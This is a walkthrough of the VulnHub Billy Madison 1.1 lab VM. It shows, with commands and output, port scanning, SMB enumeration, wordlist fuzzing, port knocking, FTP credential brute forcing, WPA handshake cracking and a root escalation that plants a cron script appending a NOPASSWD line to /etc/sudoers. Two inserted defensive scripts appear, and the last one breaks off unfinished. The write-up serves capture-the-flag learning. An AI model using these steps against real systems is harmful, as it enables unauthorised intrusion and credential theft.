[VulnHub] Billy Madison 1.1

“Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.” – Brian Johnson

For more information and the OVA download, see the VulnHub page for this VM.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.128/24)

Target: Billy Madison 1.1 (10.1.1.129/24)

Tools

All the tools used here can be found in Kali Linux.

Walkthrough

As usual, I start with arp-scan to find the target's IP address.

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.129    00:0c:29:84:da:45   VMware, Inc.
10.1.1.250    00:50:56:f9:1b:7d   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.425 seconds (105.57 hosts/sec). 4 responded

10.1.1.129 is our Target!

Then run masscan to find the open ports on the target (masscan is much faster than nmap for a full port scan, so I use it for the full sweep and then nmap for a deeper scan of the discovered ports).

root@kali:~# masscan -p1-65535 10.1.1.129/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-12-12 11:05:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.129
Discovered open port 23/tcp on 10.1.1.129
Discovered open port 139/tcp on 10.1.1.129
Discovered open port 69/tcp on 10.1.1.129
Discovered open port 445/tcp on 10.1.1.129
Discovered open port 2525/tcp on 10.1.1.129
Discovered open port 22/tcp on 10.1.1.129
... truncated ...
Nmap scan report for 10.1.1.129
Host is up (0.00032s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  tcpwrapped
23/tcp   open  telnet?
69/tcp   open  http        BaseHTTPServer
|_http-generator: WordPress 1.0
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: MadisonHotelsWordpress
|_http-title: Welcome | Just another WordPress site
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Oh nooooooo!
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  smtp
| smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok,
|_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP <topic>". End of HELP info
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:84:DA:45 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 4.X
OS CPE: cpe:/o:openbsd:openbsd:4.4
OS details: OpenBSD 4.4
Network Distance: 1 hop
Service Info: Host: BM

Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: bm
|   NetBIOS computer name: BM
|   Domain name:
|   FQDN: bm
|_  System time: 2016-12-12T05:09:11-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 10.1.1.129

NSE: Script Post-scanning.
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_  6s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.96 seconds
           Raw packets sent: 48 (4.616KB) | Rcvd: 16 (656B)

From the nmap result there are several interesting ports/vectors, and I chose to test SMB first.

Then I used nmap with the smb-enum-shares.nse script to enumerate shares.

root@kali:~# nmap -v --script smb-enum-shares.nse -p445 10.1.1.129

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-12 06:26 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:26
Completed NSE at 06:26, 0.00s elapsed
Initiating ARP Ping Scan at 06:26
Scanning 10.1.1.129 [1 port]
Completed ARP Ping Scan at 06:26, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:26
Completed Parallel DNS resolution of 1 host. at 06:26, 0.00s elapsed
Initiating SYN Stealth Scan at 06:26
Scanning 10.1.1.129 [1 port]
Discovered open port 445/tcp on 10.1.1.129
Completed SYN Stealth Scan at 06:26, 0.04s elapsed (1 total ports)
NSE: Script scanning 10.1.1.129.
Initiating NSE at 06:26
Completed NSE at 06:26, 13.32s elapsed
Nmap scan report for 10.1.1.129
Host is up (0.00023s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:84:DA:45 (VMware)

Host script results:
| smb-enum-shares:
|   account_used: guest
|   EricsSecretStuff:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\WeaselLaugh
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (BM)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

NSE: Script Post-scanning.
Initiating NSE at 06:26
Completed NSE at 06:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Here I found that the EricsSecretStuff share allows anonymous read/write access!

root@kali:~# smbclient \\\\10.1.1.129\\EricsSecretStuff\\
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Mon Dec 12 17:03:27 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Mon Dec 12 17:03:27 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

      30291996 blocks of size 1024. 25919088 blocks available
smb: \> get ebd.txt
getting file \ebd.txt of size 35 as ebd.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit

Download the file ebd.txt and read it:

root@kali:~/myTest/BillyMadison1.1# cat ebd.txt
Erics backdoor is currently CLOSED

OK, looks like I need to find a way to activate the backdoor.

Now back to port 23: I telnet to the target.

root@kali:~# telnet 10.1.1.129 23
Trying 10.1.1.129...
Connected to 10.1.1.129.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Nothing special here, but note that the target used to use a ROT-10 cipher, with the potential key rkfpuzrahngvat.

Then I used a Python script to generate all the ROT variants of that string:

root@kali:~/myTest/BillyMadison1.1# cat rot.py 
#!/usr/bin/env python3
# Print every rotation (ROT-0 .. ROT-25) of the lowercase word given as argv[1],
# one per line, so the output can be used directly as a wordlist.
import sys
from string import ascii_lowercase as lc

for n in range(26):
    # Map each letter to the one n positions further along the alphabet.
    table = str.maketrans(lc, lc[n:] + lc[:n])
    print(sys.argv[1].translate(table))

Alternatively, an online ROT tool does the same job.

Then run the script with the argument rkfpuzrahngvat and save the result to rot-rst.txt:

root@kali:~/myTest/BillyMadison1.1# ./rot.py "rkfpuzrahngvat" | tee rot-rst.txt
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
unisxcudkqjydw
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
qjeotyqzgmfuzs

Then I noticed that a WordPress site is running on port 69, so I used wpscan to do a quick scan.

root@kali:~/myTest/BillyMadison1.1# wpscan -u http://10.1.1.129:69/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
Y
[+] URL: http://10.1.1.129:69/
[+] Started: Mon Dec 12 06:46:45 2016

[!] The WordPress 'http://10.1.1.129:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://10.1.1.129:69/xmlrpc.php

[+] WordPress version 1.0 (Released on 2004-01-03) identified from meta generator, readme

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Latest version: 2.5
 |  Location: http://10.1.1.129:69/wp-content/themes/twentyeleven/
 |  Readme: http://10.1.1.129:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://10.1.1.129:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://10.1.1.129:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://10.1.1.129:69/static/wp-content/themes/twentyeleven/style.css

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Dec 12 06:46:45 2016
[+] Requests Done: 66
[+] Memory used: 15.719 MB
[+] Elapsed time: 00:00:00

Nothing found. :`(

So I moved on to port 80. There is no clue on the home page apart from three pictures, and nothing in the source code either.

Then I downloaded the three images and used exiftool to check whether anything was hidden in them, but no luck.

Next I fed the ROT strings from rot-rst.txt to wfuzz as a directory wordlist against port 80:

root@kali:~/myTest/BillyMadison1.1# wfuzz -c --hc=404 -z file,/root/myTest/BillyMadison1.1/rot-rst.txt http://10.1.1.129/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.129/FUZZ
Total requests: 26

==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00008:  C=301      9 L         28 W       317 Ch     "exschmenuating"

Total time: 1.990103
Processed Requests: 26
Filtered Requests: 25
Requests/sec.: 13.06464

Great, one string gets a hit: exschmenuating.

From this page I first got the clue that veronica would be part of the password, so I filtered every word containing veronica out of the well-known rockyou.txt wordlist.

root@kali:~/myTest/BillyMadison1.1# grep 'veronica' /usr/share/wordlists/rockyou.txt > pass.lst
root@kali:~/myTest/BillyMadison1.1# cat pass.lst | wc -l
773

Also, there should be a 'captured' file (usually with a .cap extension) in that folder, with veronica as part of the file name. So I ran wfuzz again to search for it.

root@kali:~/myTest/BillyMadison1.1# wfuzz -c --hc=404 -z file,/root/myTest/BillyMadison1.1/pass.lst http://10.1.1.129/exschmenuating/FUZZ.cap
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.129/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00522:  C=400     10 L         35 W       302 Ch     "veronica$%"
00716:  C=200    192 L        722 W      8700 Ch     "012987veronica"
00726:  C=200     24 L        162 W      1080 Ch     "#0104veronica"

Total time: 1.617280
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 477.9627

Then I downloaded the captured file http://10.1.1.129/exschmenuating/012987veronica.cap and read it:

RE: VIRUS ALERT!
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s
QUIT

So FTP is turned off by default and needs port knocking to activate it. From the YouTube video I got the port knock sequence: 1466, 67, 1469, 1514, 1981, 1986, 1588.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.1.1.129; done
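The knock mechanism described above, seen from the server's side, as an added example that is not part of this walkthrough or the VM: a tracker that watches connection attempts (constructed iptables-style log records) and decides when a client has hit the sequence in order, resetting on an out-of-order knock or a stale one. The 10-second window between knocks, the log field names and the sample addresses are assumptions.

```python
"""Server-side port-knock tracker (added example, not from the walkthrough)."""

from dataclasses import dataclass, field

# Knock sequence as listed in the text above.
KNOCK_SEQUENCE = (1466, 67, 1469, 1514, 1981, 1986, 1588)
KNOCK_WINDOW = 10.0  # assumed: seconds allowed between consecutive knocks


@dataclass
class KnockState:
    index: int = 0        # how many ports of the sequence matched so far
    last_ts: float = 0.0  # timestamp of the last accepted knock


@dataclass
class KnockTracker:
    sequence: tuple = KNOCK_SEQUENCE
    window: float = KNOCK_WINDOW
    states: dict = field(default_factory=dict)
    opened: list = field(default_factory=list)  # (timestamp, ip) completions

    def observe(self, ts, src_ip, dst_port):
        """Process one connection attempt; True when src_ip just finished the sequence."""
        st = self.states.setdefault(src_ip, KnockState())
        # Too slow: a partial sequence expires and the client starts over.
        if st.index > 0 and ts - st.last_ts > self.window:
            st.index = 0
        if dst_port == self.sequence[st.index]:
            st.index += 1
        else:
            # A wrong port resets progress; hitting the first port still counts.
            st.index = 1 if dst_port == self.sequence[0] else 0
        st.last_ts = ts
        if st.index == len(self.sequence):
            st.index = 0
            self.opened.append((ts, src_ip))
            return True
        return False


def parse_log_line(line):
    """Parse a constructed 'KEY=value' firewall record into (ts, src_ip, dst_port)."""
    fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
    return float(fields["TS"]), fields["SRC"], int(fields["DPT"])


def completed_knocks(log_lines, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW):
    """Return the list of (ts, ip) pairs that completed the knock within the log."""
    tracker = KnockTracker(sequence=sequence, window=window)
    for line in log_lines:
        tracker.observe(*parse_log_line(line))
    return tracker.opened


# Constructed sample log: 10.1.1.128 knocks correctly, 10.1.1.50 skips a port.
SAMPLE_LOG = [
    "TS=100.0 SRC=10.1.1.128 DPT=1466 PROTO=TCP",
    "TS=100.5 SRC=10.1.1.50 DPT=1466 PROTO=TCP",
    "TS=101.0 SRC=10.1.1.128 DPT=67 PROTO=TCP",
    "TS=101.2 SRC=10.1.1.50 DPT=1469 PROTO=TCP",  # skipped 67: reset
    "TS=102.0 SRC=10.1.1.128 DPT=1469 PROTO=TCP",
    "TS=103.0 SRC=10.1.1.128 DPT=1514 PROTO=TCP",
    "TS=104.0 SRC=10.1.1.128 DPT=1981 PROTO=TCP",
    "TS=105.0 SRC=10.1.1.128 DPT=1986 PROTO=TCP",
    "TS=106.0 SRC=10.1.1.128 DPT=1588 PROTO=TCP",
]

if __name__ == "__main__":
    for ts, ip in completed_knocks(SAMPLE_LOG):
        print(f"{ip} completed the knock sequence at t={ts}")
```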

After knocking, I used nmap to check whether FTP is open:

root@kali:~/myTest/BillyMadison1.1# nmap -p21 -v 10.1.1.129

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-13 06:38 EST
Initiating ARP Ping Scan at 06:38
Scanning 10.1.1.129 [1 port]
Completed ARP Ping Scan at 06:38, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:38
Completed Parallel DNS resolution of 1 host. at 06:38, 0.00s elapsed
Initiating SYN Stealth Scan at 06:38
Scanning 10.1.1.129 [1 port]
Discovered open port 21/tcp on 10.1.1.129
Completed SYN Stealth Scan at 06:38, 0.05s elapsed (1 total ports)
Nmap scan report for 10.1.1.129
Host is up (0.00040s latency).
PORT   STATE SERVICE
21/tcp open  ftp
MAC Address: 00:0C:29:84:DA:45 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~/myTest/BillyMadison1.1#

Great, port 21 is now open.

From the next email, I found the FTP login information:

Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.


Veronica,
Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

Note Eric's FTP login here: eric/ericdoesntdrinkhisownpee

Now I log in to FTP as eric:

root@kali:~/myTest/BillyMadison1.1# ftp 10.1.1.129
Connected to 10.1.1.129.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.1.1.129:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
226 Transfer completed.

I then downloaded all the files and read .notes:

root@kali:~/myTest/BillyMadison1.1/eric_ftp# cat .notes
Ugh, this is frustrating.

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From the YouTube video, the sentence should be "My kid will be a soccer player".

Then I telnet to the SMTP server on port 2525 and send the email to Veronica:

root@kali:~/myTest/BillyMadison1.1# telnet 10.1.1.129 2525
Trying 10.1.1.129...
Connected to 10.1.1.129.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
EHLO kali
250-BM
250-8BITMIME
250-AUTH LOGIN
250 Ok
MAIL FROM:eric@madisonhotels.com
250 Ok
RCPT TO:vvaughn@polyfector.edu
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player


.
250 Ok
421 Timeout waiting for data from client.
Connection closed by foreign host.

After sending the email, I connected back to the SMB share to check ebd.txt again:

root@kali:~/myTest/BillyMadison1.1# smbclient //10.1.1.129/EricsSecretStuff
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Dec 13 08:09:29 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  131216070929482.eml                 N       96  Tue Dec 13 08:09:29 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  131216070428392.eml                 N      267  Tue Dec 13 08:04:28 2016
  ebd.txt                             N       53  Tue Dec 13 08:10:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

      30291996 blocks of size 1024. 25921952 blocks available
smb: \> get ebd.txt
getting file \ebd.txt of size 53 as ebd.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \>


root@kali:~/myTest/BillyMadison1.1# cat ebd.txt
2016-12-13-07-11-01
Erics backdoor is currently OPEN

So now the backdoor is OPEN.

Then a quick port scan with masscan:

root@kali:~/myTest/BillyMadison1.1# masscan -p1-65535 10.1.1.129/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-12-13 13:08:00 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 69/tcp on 10.1.1.129
Discovered open port 21/tcp on 10.1.1.129
Discovered open port 139/tcp on 10.1.1.129
Discovered open port 80/tcp on 10.1.1.129
Discovered open port 23/tcp on 10.1.1.129
Discovered open port 1974/tcp on 10.1.1.129
Discovered open port 2525/tcp on 10.1.1.129
Discovered open port 22/tcp on 10.1.1.129
Discovered open port 445/tcp on 10.1.1.129

Compared with the previous scan, the new port is 1974. A deeper nmap scan of port 1974 shows SSH running on it.

root@kali:~/myTest/BillyMadison1.1# nmap -v -p1974 -sV 10.1.1.129

...truncated...
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:84:DA:45 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...truncated...

Next, from the previous clues, veronica should have an FTP account, so I tried to find her password with ncrack (medusa works too) using the pass.lst wordlist generated earlier from rockyou.txt.

root@kali:~/myTest/BillyMadison1.1# ncrack -u veronica -P pass.lst -T 5 10.1.1.129 -p 21

Starting Ncrack 0.5 ( http://ncrack.org ) at 2016-12-13 08:13 EST

Discovered credentials for ftp on 10.1.1.129 21/tcp:
10.1.1.129 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 189.04 seconds.

Ncrack finished.

Great, now I log in to FTP as veronica and find two files:

root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# ftp 10.1.1.129 21
Connected to 10.1.1.129.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.1.1.129:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
226 Transfer completed.

I downloaded both and checked the email first:

root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# cat email-from-billy.eml
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

The other file is a .cap file, which sure enough is the wireless handshake capture, so I fired up aircrack-ng with rockyou.txt to crack the wireless password:

root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# aircrack-ng -w /usr/share/wordlists/rockyou.txt eg-01.cap
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:18:52] 1699632/9822768 keys tested (1637.45 k/s)

      Time left: 1 hour, 22 minutes, 42 seconds                 17.30%

                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder#

Great! Now I can log in as Eric via the backdoor on port 1974:

root@kali:~/myTest/BillyMadison1.1# ssh eric@10.1.1.129 -p 1974
eric@10.1.1.129's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

37 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@BM:~$ pwd
/home/eric
eric@BM:~$ ls -la
total 532
drwxr-xr-x 3 eric eric   4096 Aug 23 00:18 .
drwxr-xr-x 6 root root   4096 Aug 20 13:56 ..
-rw-r--r-- 1 eric eric    220 Aug 20 13:56 .bash_logout
-rw-r--r-- 1 eric eric   3771 Aug 20 13:56 .bashrc
drwx------ 2 eric eric   4096 Aug 20 14:07 .cache
-rw-r--r-- 1 root root 451085 Aug  7 22:31 eric-tongue-animated.gif
-rw-r--r-- 1 root root  60710 Aug  7 22:29 eric-unimpressed.jpg
-rw-r--r-- 1 eric eric    655 Aug 20 13:56 .profile
-rw-r--r-- 1 root root    115 Aug 20 20:41 why-1974.txt
eric@BM:~$ uname -a
Linux BM 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
eric@BM:~$ 

Now I’m in.

Then I did enumeration in preparation for rooting.

However, neither LinEnum.sh nor linuxprivchecker.py gave me any useful suggestion for privilege escalation.

Then I followed g0tm1lk's basic Linux privilege escalation guide and found a program with the setuid and setgid bits set.

eric@BM:/etc/cron.hourly# find / -perm -g=s -perm -u=s -type f -ls 2>/dev/null
  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1058032     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 14  2016 /usr/bin/at

Checking the program /usr/local/share/sgml/donpcgd:

eric@BM:~# /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

eric@BM:~# /usr/local/share/sgml/donpcgd /etc/shadow /tmp/shadow
#### mknod(/tmp/shadow,81a0,0)
eric@BM:~# ls -al /tmp/shadow
-rw-r----- 1 root shadow 0 Jan  7 04:55 /tmp/shadow

This program "copies" the file at path1 to path2, but only the name is the same: the content is not copied and the new file is empty.

That means I can create a file at any location by taking advantage of this program.

So I created a cron.hourly entry containing a bash script that adds eric to the sudoers file.

eric@BM:~$ touch /tmp/rootme
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/rootme,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/rootme
eric@BM:~$ chmod +x /etc/cron.hourly/rootme
eric@BM:~$ cat /etc/cron.hourly/rootme
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

After waiting an hour, I checked whether rootme had executed by running sudo su.

eric@BM:~$ sudo su
root@BM:/home/eric# id
uid=0(root) gid=0(root) groups=0(root)
root@BM:/home/eric#

Great, now I am root!!
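A defender's check for the persistence step above, written as an added example (not code from the walkthrough): it audits the system cron directories for entries that are not owned by root or that are group/world-writable, which is exactly the shape of the planted /etc/cron.hourly/rootme (mode 0664 with a non-root group). The demo tree it builds under a temp directory, and the file names in it, are constructed; on a live box you would run audit_cron_dirs() with its defaults as root.

```python
"""Audit cron directories for non-root-owned or writable entries (added example)."""

import os
import stat
import tempfile

# Directories whose contents cron runs as root on Debian/Ubuntu.
CRON_DIRS = ("/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
             "/etc/cron.weekly", "/etc/cron.monthly")


def audit_cron_entry(path, expected_uid=0):
    """Return a list of findings for one cron entry; an empty list means clean."""
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")  # run-parts follows it; inspect the target
    if st.st_uid != expected_uid:
        findings.append(f"owner uid {st.st_uid} != {expected_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_cron_dirs(dirs=CRON_DIRS, expected_uid=0):
    """Map each suspicious path under the given directories to its findings."""
    report = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            findings = audit_cron_entry(path, expected_uid)
            if findings:
                report[path] = findings
    return report


def build_demo_tree():
    """Constructed cron.hourly lookalike in a temp dir: one clean entry and one
    planted entry with the 0664 mode the SUID helper gave 'rootme'."""
    hourly = os.path.join(tempfile.mkdtemp(prefix="cron-audit-"), "cron.hourly")
    os.mkdir(hourly)
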